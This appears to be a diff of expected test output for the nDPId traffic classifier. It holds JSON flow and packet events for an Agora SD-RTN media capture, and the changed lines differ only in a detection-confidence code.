00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1649098094676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098094676,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnadAAD8Rb7jAqAJkgAHp2tgaH8IA8ZNOAIvfcAAAIQAAAAAABFNOSQAbADEyOC0xLTIzMy0yMTguZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAApfs6FeucFt3UJmlHV\/+qfWl4ZO66hJe2FMaw985tQUVBRAQAQUVTR1BVQlNBAASl7alnNwBac\/EM8\/e3OTwxYjqU4L8L+DfMIlwLYBmF2RVcj8IsWMZ8xtI3LcXYd4rg7aVow0QpJr1ImfC\/7ik+S0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098094676,"flow_last_seen":1649098094676,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098094676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098094676,"flow_last_seen":1649098094676,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098094676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1649098094676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098094676,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnahAAD8Rb7fAqAJkgAHp2tgaH8IA8ZNOAIvfcAAAIQAAAAAABFNOSQAbADEyOC0xLTIzMy0yMTguZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAApfs6FeucFt3UJmlHV\/+qfWl4ZO66hJe2FMaw985tQUVBRAQAQUVTR1BVQlNBAASl7alnNwBac\/EM8\/e3OTwxYjqU4L8L+DfMIlwLYBmF2RVcj8IsWMZ8xtI3LcXYd4rg7aVow0QpJr1ImfC\/7ik+S0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1649098094676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098094676,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnalAAD8Rb7bAqAJkgAHp2tgaH8IA8ZNOAIvfcAAAIQAAAAAABFNOSQAbADEyOC0xLTIzMy0yMTguZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAApfs6FeucFt3UJmlHV\/+qfWl4ZO66hJe2FMaw985tQUVBRAQAQUVTR1BVQlNBAASl7alnNwBac\/EM8\/e3OTwxYjqU4L8L+DfMIlwLYBmF2RVcj8IsWMZ8xtI3LcXYd4rg7aVow0QpJr1ImfC\/7ik+S0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098129676,"flow_last_seen":1649098129676,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098129676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1649098129676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098129676,"pkt":"eJS0JASgYDjgxTWgCABFoAEG8ltAAD8RjrLAqAJkwXY0ttgaH8IA8j0KAHm3rAAAIQAAAAAABFNOSQAcADE5My0xMTgtNTItMTgyLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKYe5uMMeslRB3XNb4oIMtxM1Kq4uVO9ATPzLnBeCEFFQUQEAEFFU0dQVUJTQQAEfMIBHrlyhJSJQxs1oKYK9vHZz2ftsZjVFavleGiXwVxs5oZBr4mTdCDKj32Pfmb663V\/iNj2FyPr9qh0qRkaWEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098129676,"flow_last_seen":1649098129676,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098129676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098129676,"flow_last_seen":1649098129676,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098129676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1649098129676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098129676,"pkt":"eJS0JASgYDjgxTWgCABFoAEG8lxAAD8RjrHAqAJkwXY0ttgaH8IA8j0KAHm3rAAAIQAAAAAABFNOSQAcADE5My0xMTgtNTItMTgyLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKYe5uMMeslRB3XNb4oIMtxM1Kq4uVO9ATPzLnBeCEFFQUQEAEFFU0dQVUJTQQAEfMIBHrlyhJSJQxs1oKYK9vHZz2ftsZjVFavleGiXwVxs5oZBr4mTdCDKj32Pfmb663V\/iNj2FyPr9qh0qRkaWEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1649098129677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098129677,"pkt":"eJS0JASgYDjgxTWgCABFoAEG8l1AAD8RjrDAqAJkwXY0ttgaH8IA8j0KAHm3rAAAIQAAAAAABFNOSQAcADE5My0xMTgtNTItMTgyLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKYe5uMMeslRB3XNb4oIMtxM1Kq4uVO9ATPzLnBeCEFFQUQEAEFFU0dQVUJTQQAEfMIBHrlyhJSJQxs1oKYK9vHZz2ftsZjVFavleGiXwVxs5oZBr4mTdCDKj32Pfmb663V\/iNj2FyPr9qh0qRkaWEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":211,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":211,"packets-processed":210,"total-skipped-flows":0,"total-l4-payload-len":50011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":14,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":82,"global_ts_msec":1649098819739} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3368,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098094676,"flow_last_seen":1649098094756,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098070259,"flow_last_seen":1649098070310,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3300,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098069656,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":818,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098129676,"flow_last_seen":1649098129719,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1649098089567,"flow_last_seen":1649098819802,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":7165,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3368,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098094676,"flow_last_seen":1649098094756,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098070259,"flow_last_seen":1649098070310,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3300,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098069656,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":818,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098129676,"flow_last_seen":1649098129719,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.118.52.182","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1649098089567,"flow_last_seen":1649098819802,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":7165,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1649098819802,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098849713,"flow_last_seen":1649098849713,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098849713,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1649098849713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098849713,"pkt":"eJS0JASgYDjgxTWgCABFoAEFjY5AAD8Rp8zAqAJkgAHB39gaH8IA8ZWbALrcNQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqO653g\/hCRLYJiWr5HwhPLNmBmFf1jZ6sWoE3wYWQUVBRAQAQUVTR1BVQlNBAAShXWD9bdPdTqNRd9XnrAbDYLUfMQlth+FXkrmXNCnpwnaRd1+zUbpvZZqEZL8R\/FHgoWlN8+rWWaa4DpcfkLsbS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098849713,"flow_last_seen":1649098849713,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098849713,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098849713,"flow_last_seen":1649098849713,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098849713,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1649098849713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098849713,"pkt":"eJS0JASgYDjgxTWgCABFoAEFjY9AAD8Rp8vAqAJkgAHB39gaH8IA8ZWbALrcNQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqO653g\/hCRLYJiWr5HwhPLNmBmFf1jZ6sWoE3wYWQUVBRAQAQUVTR1BVQlNBAAShXWD9bdPdTqNRd9XnrAbDYLUfMQlth+FXkrmXNCnpwnaRd1+zUbpvZZqEZL8R\/FHgoWlN8+rWWaa4DpcfkLsbS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1649098849714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098849714,"pkt":"eJS0JASgYDjgxTWgCABFoAEFjZBAAD8Rp8rAqAJkgAHB39gaH8IA8ZWbALrcNQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqO653g\/hCRLYJiWr5HwhPLNmBmFf1jZ6sWoE3wYWQUVBRAQAQUVTR1BVQlNBAAShXWD9bdPdTqNRd9XnrAbDYLUfMQlth+FXkrmXNCnpwnaRd1+zUbpvZZqEZL8R\/FHgoWlN8+rWWaa4DpcfkLsbS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098879720,"flow_last_seen":1649098879720,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098879720,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1649098879720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098879720,"pkt":"eJS0JASgYDjgxTWgCABFoAEGd\/pAAD8RLJTAqAJkF\/i6tNgaH8IA8lmLAAvF0QAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKkMl1gIyv+w78yvVi1\/kuox+eyErqTnp6Gof+weXkFFQUQEAEFFU0dQVUJTQQAEARJ6wuFU0FclpuLErlZIBuYOHSiMTxKbnkNZkTr3XWhuScUrr\/UN5B3XPbFSiNGAO2v5lJKJeGbxaqRfZNKmhUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098879720,"flow_last_seen":1649098879720,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098879720,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098879720,"flow_last_seen":1649098879720,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098879720,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1649098879721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098879721,"pkt":"eJS0JASgYDjgxTWgCABFoAEGd\/tAAD8RLJPAqAJkF\/i6tNgaH8IA8lmLAAvF0QAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKkMl1gIyv+w78yvVi1\/kuox+eyErqTnp6Gof+weXkFFQUQEAEFFU0dQVUJTQQAEARJ6wuFU0FclpuLErlZIBuYOHSiMTxKbnkNZkTr3XWhuScUrr\/UN5B3XPbFSiNGAO2v5lJKJeGbxaqRfZNKmhUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 